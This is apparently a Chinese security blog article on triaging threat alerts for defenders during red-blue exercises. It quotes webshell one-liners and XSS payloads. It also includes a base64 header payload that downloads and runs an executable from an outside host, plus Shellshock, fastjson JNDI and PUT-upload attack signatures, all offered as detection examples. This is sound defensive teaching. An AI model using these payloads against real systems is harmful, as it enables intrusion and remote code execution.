威胁事件告警分析技巧及处置(二)

  • A+
所属分类:安全闲碎
威胁事件告警分析技巧及处置(二)

声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!!!






START

0x01前言

由于近几年信息安全人员紧缺,面临HW急需安全人员的竞赛中,许多安全厂商降低招聘要求,招收大量安全工作经验较少的人员参与HW当中,由于缺乏相应的工作经验,面对攻击团队的频繁入侵,导致误判、错封攻击源IP地址,进而对公司业务造成严重影响。小编对此对攻击流特征进行了一个详细的总结,本文适用于可查看攻击数据流量的设备,如:waf、ids、ips、天眼、睿眼以及其他全流量分析系统等。

0x02期望效果


看完本文后,您能学到:

>常见告警攻击特征识别

低危告警攻击事件忽略

研判告警攻击是否误报

复杂告警攻击Pcap取证

验证告警攻击是否成功


0x03webshell后门特征

webshell后门包含但不限于以下:
<%eval request("pass")%><%eval(Request.Item["pass"],"unsafe");%><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> <?php @eval($_POST["pass"]);?>e'.'v'.'a'.'l(gz'.'inf'.'lat'.'e(bas'.'e64_'.'deco'.'de('7P35d1zXdSeK/0yv5f/hqgyrAKsA3nkgBFp3lChxMkFqJB9eASiAJQIoGFXgIIp/jJPuFz13esWSNdiWZMWSbMnyIFmSZccr6U7c6XSn9dyvM3QmJ72+n88+9966twYQlO3kZX0bEoGqe8989tnz3qe3utIftPcGs3OLn/7Uemeju9OZbW7faK+v73X6/WZrZmU5Pfdweu6J5nJ87sTZ8yvZiZPp6fBU2rxUrdHZubq125YK/HOtt7defd2/3Nna2mlvd/C+/FzvcX9vCy/lL190N2bv2+wMVrbbm921lS/u9wad/srm7trs3NzNT3/qyEZvr9Neuzw7s3L2zPJ5rd3XZq5oS8e1matzmnr2xMyVS9qS1h/sdXf7W2302p/F28Va5fvTsbp4NL3qLRlYt9/vDFD7XPqFCyl6KiZ/ScZ2eXurt9ndmTVZ4b7O1fbWxKJ42bneHSyqJmdW4jNnHjqRPjFcyUvaXUva9rozWzxRM5fCMsFKUXkz+ZW2tKSeval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));/xxx.aspx;(1).jpg、test.asp;1.jpg/xxx.jpg/xxx.php/xxx.php [;][%00][%81].jpg/xxx.cer*.asaxxx.php.owf.rar


0x04跨站脚本攻击特征

跨站脚本攻击包含但不限于以下:

 </script>"><script>prompt(1)</script>"><img src=x onerror=prompt(1)>"><svg/onload=prompt(1)>"><iframe/src=javascript:prompt(1)>"><h1 onclick=prompt(1)>Clickme</h1>"><a href=javascript:prompt(1)>Clickme</a>"><textarea autofocus onfocus=prompt(1)><DEFANGED_SCRIPT>alert(document.domain)</DEFANGED_SCRIPT>onload=window.open("http://www.google.com")<script>alert("XSS")<%2Fscript>'-alert(123)-

0x05漏洞扫描特征

扫描器扫描行为特征包含但不限于以下:

 awvs Acunetix-Aspect by_wvs/acunetix-wvs-test-for-some-inexistent-file acunetix_wvs_security_test netsparker Appscan nessus sqlmap nmap masscan

0x06wireshark pcap包分析


wireshark pcap分析主要的就是熟悉基本的筛选,以及很重要的是追踪流,推荐是TCP流或UDP流,这些能进行切换,如果是HTTP流可能不方便看下面的几个数据流。


威胁事件告警分析技巧及处置(二)


0x07请求行为分析


请求行为分析包含但不限于以下这些:

正常行为:

 SQL注入如果只有where 1=1,其余字段无异常,或者有中文、真实字段,那么可能是误报。

  跨站脚本攻击中,如只有js或者css代码,无明显攻击特征行为,那么可能是误报。

异常行为:
     User-Agent
     X-Forwarded-For

     Accept-Charset:base 编码内容如:

(c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vZmsub3BlbnlvdXJhc3MuY2x1Yi9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvbWd3bHR1emx2eWxpcGJhOTkzNC5leGUgJiAlU3lzdGVtUm9vdCUvVGVtcC9tZ3dsdHV6bHZ5bGlwYmE5OTM0LmV4ZScpO2VjaG8gbWQ1KCdwaHBzdHVkeScpOw==)

异常外部URL:
      rmi://fastjson_rcenlbODRGW.awvsscan119.autoverify.cn/poc,                              
     ldap://xx.xx.xx.xx/
异常HTTP传输行为:
      PUT /FxCodeShell.jsp/,
      PUT /FxCodeShell.jsp::$DATA
异常HTTP header行为:
       Range: bytes=0-18446744073709551615
     Bad-Bash: () { :; }; echo echo Bad-Bash: tznupowcysf;
异常HTTP主体内容行为:

     <soapenv:Envelope xmlns:soapenv=xxxxxxxxxxx 需结合业务系统情况进行分析,如果里面有cmd bash等命令执行特征则不是误报!


0x08攻击成功判断


对确认为真实攻击的行为需要进行研判,是否攻击成功,主要是通过以下方式但不限于进行:

  • 基于流量payload信息判断攻击成功与否。例如web攻击,如果响应码为4XX,则多数可以判定为失败,但是为200的不一定就是成功,还需要结合响应主体进行判断。另外如果使用目录遍历读取/etc/passwd,且响应包里面有这些特征可判断为攻击成功.

    root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologin


  • 基于攻击告警和行为审计日志判断攻击成功与否。例如产生了暴力破解告警,同时发现相关的登录成功告警,则攻击成功。


  • 基于不同告警日志的关联判断攻击成功与否。例如产生了永恒之蓝漏洞利用的告警,同时发现漏洞利用成功的反连行为的告警,则说明永恒之蓝漏洞利用成功;或者产生了redis未授权写ssh密钥的行为,且后面有登录ssh的行为也基本可判断为攻击成功,但是具体与否还需要登录服务器进行查看,毕竟ssh也是加密传输的!


0x08常见编码


在监测过程中会遇到很多编码,对于特征不能一目了然,那么需要熟悉对应的编码或加密方式并进行转换和解码,常见编码包含但不限于以下这些:

URL:
%xx: %3Cscript%3Ealert%28123%29%3C/script%3E

解码网站:

http://tool.chinaz.com/tools/urlencode.aspx


实体化编码:

 &#x:&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;      &#:&#60;&#115;&#99;&#114;&#105;&#112;     、 &lt;script&gt;alert(123)&lt;/script&gt;

base64:
=:MTIzNDU2Nw==

解码网站

http://tool.chinaz.com/Tools/Base64.aspx


Unicode编码

 u:u0031u0032u0033u0034u0035u0036

解码网站:

http://tool.chinaz.com/tools/unicode.aspx







END
威胁事件告警分析技巧及处置(二)

威胁事件告警分析技巧及处置(二)

2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)

HW中如何检测和阻止DNS隧道

ctf系列文章整理

日志安全系列-安全日志

【干货】流量分析系列文章整理

【干货】超全的 渗透测试系列文章整理

【干货】持续性更新-内网渗透测试系列文章

【干货】android安全系列文章整理



扫描关注LemonSec

威胁事件告警分析技巧及处置(二)

威胁事件告警分析技巧及处置(二)


本文始发于微信公众号(LemonSec):威胁事件告警分析技巧及处置(二)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: